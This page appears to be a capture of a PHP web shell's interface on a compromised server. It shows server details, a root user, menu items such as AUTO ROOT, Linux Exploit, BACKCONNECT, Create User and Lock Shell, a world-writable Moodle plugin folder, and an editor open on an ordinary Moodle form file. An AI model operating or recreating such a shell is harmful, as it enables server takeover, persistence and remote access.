Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
blocks /
myprofile /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxrwxrwx
db
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
templates
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
block_myprofile.php
3.79
KB
-rwxrwxrwx
edit_form.php
7.25
KB
-rwxrwxrwx
styles.css
481
B
-rwxrwxrwx
version.php
1.19
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_form.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. defined('MOODLE_INTERNAL') || die(); /** * Form for editing profile block settings * * @package block_myprofile * @copyright 2010 Remote-Learner.net * @author Olav Jordan <olav.jordan@remote-learner.ca> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ class block_myprofile_edit_form extends block_edit_form { protected function specific_definition($mform) { global $CFG; $mform->addElement('header', 'configheader', get_string('myprofile_settings', 'block_myprofile')); $mform->addElement('selectyesno', 'config_display_picture', get_string('display_picture', 'block_myprofile')); if (isset($this->block->config->display_picture)) { $mform->setDefault('config_display_picture', $this->block->config->display_picture); } else { $mform->setDefault('config_display_picture', '1'); } $mform->addElement('selectyesno', 'config_display_country', get_string('display_country', 'block_myprofile')); if (isset($this->block->config->display_country)) { $mform->setDefault('config_display_country', $this->block->config->display_country); } else { $mform->setDefault('config_display_country', '1'); } $mform->addElement('selectyesno', 'config_display_city', get_string('display_city', 'block_myprofile')); if (isset($this->block->config->display_city)) { $mform->setDefault('config_display_city', $this->block->config->display_city); } else { $mform->setDefault('config_display_city', '1'); } $mform->addElement('selectyesno', 'config_display_email', get_string('display_email', 'block_myprofile')); if (isset($this->block->config->display_email)) { $mform->setDefault('config_display_email', $this->block->config->display_email); } else { $mform->setDefault('config_display_email', '1'); } $mform->addElement('selectyesno', 'config_display_icq', get_string('display_icq', 'block_myprofile')); if (isset($this->block->config->display_icq)) { $mform->setDefault('config_display_icq', $this->block->config->display_icq); } else { $mform->setDefault('config_display_icq', '0'); } $mform->addElement('selectyesno', 'config_display_skype', get_string('display_skype', 'block_myprofile')); if (isset($this->block->config->display_skype)) { $mform->setDefault('config_display_skype', $this->block->config->display_skype); } else { $mform->setDefault('config_display_skype', '0'); } $mform->addElement('selectyesno', 'config_display_yahoo', get_string('display_yahoo', 'block_myprofile')); if (isset($this->block->config->display_yahoo)) { $mform->setDefault('config_display_yahoo', $this->block->config->display_yahoo); } else { $mform->setDefault('config_display_yahoo', '0'); } $mform->addElement('selectyesno', 'config_display_aim', get_string('display_aim', 'block_myprofile')); if (isset($this->block->config->display_aim)) { $mform->setDefault('config_display_aim', $this->block->config->display_aim); } else { $mform->setDefault('config_display_aim', '0'); } $mform->addElement('selectyesno', 'config_display_msn', get_string('display_msn', 'block_myprofile')); if (isset($this->block->config->display_msn)) { $mform->setDefault('config_display_msn', $this->block->config->display_msn); } else { $mform->setDefault('config_display_msn', '0'); } $mform->addElement('selectyesno', 'config_display_phone1', get_string('display_phone1', 'block_myprofile')); if (isset($this->block->config->display_phone1)) { $mform->setDefault('config_display_phone1', $this->block->config->display_phone1); } else { $mform->setDefault('config_display_phone1', '0'); } $mform->addElement('selectyesno', 'config_display_phone2', get_string('display_phone2', 'block_myprofile')); if (isset($this->block->config->display_phone2)) { $mform->setDefault('config_display_phone2', $this->block->config->display_phone2); } else { $mform->setDefault('config_display_phone2', '0'); } $mform->addElement('selectyesno', 'config_display_institution', get_string('display_institution', 'block_myprofile')); if (isset($this->block->config->display_institution)) { $mform->setDefault('config_display_institution', $this->block->config->display_institution); } else { $mform->setDefault('config_display_institution', '0'); } $mform->addElement('selectyesno', 'config_display_address', get_string('display_address', 'block_myprofile')); if (isset($this->block->config->display_address)) { $mform->setDefault('config_display_address', $this->block->config->display_address); } else { $mform->setDefault('config_display_address', '0'); } $mform->addElement('selectyesno', 'config_display_firstaccess', get_string('display_firstaccess', 'block_myprofile')); if (isset($this->block->config->display_firstaccess)) { $mform->setDefault('config_display_firstaccess', $this->block->config->display_firstaccess); } else { $mform->setDefault('config_display_firstaccess', '0'); } $mform->addElement('selectyesno', 'config_display_lastaccess', get_string('display_lastaccess', 'block_myprofile')); if (isset($this->block->config->display_lastaccess)) { $mform->setDefault('config_display_lastaccess', $this->block->config->display_lastaccess); } else { $mform->setDefault('config_display_lastaccess', '0'); } $mform->addElement('selectyesno', 'config_display_currentlogin', get_string('display_currentlogin', 'block_myprofile')); if (isset($this->block->config->display_currentlogin)) { $mform->setDefault('config_display_currentlogin', $this->block->config->display_currentlogin); } else { $mform->setDefault('config_display_currentlogin', '0'); } $mform->addElement('selectyesno', 'config_display_lastip', get_string('display_lastip', 'block_myprofile')); if (isset($this->block->config->display_lastip)) { $mform->setDefault('config_display_lastip', $this->block->config->display_lastip); } else { $mform->setDefault('config_display_lastip', '0'); } } }
Close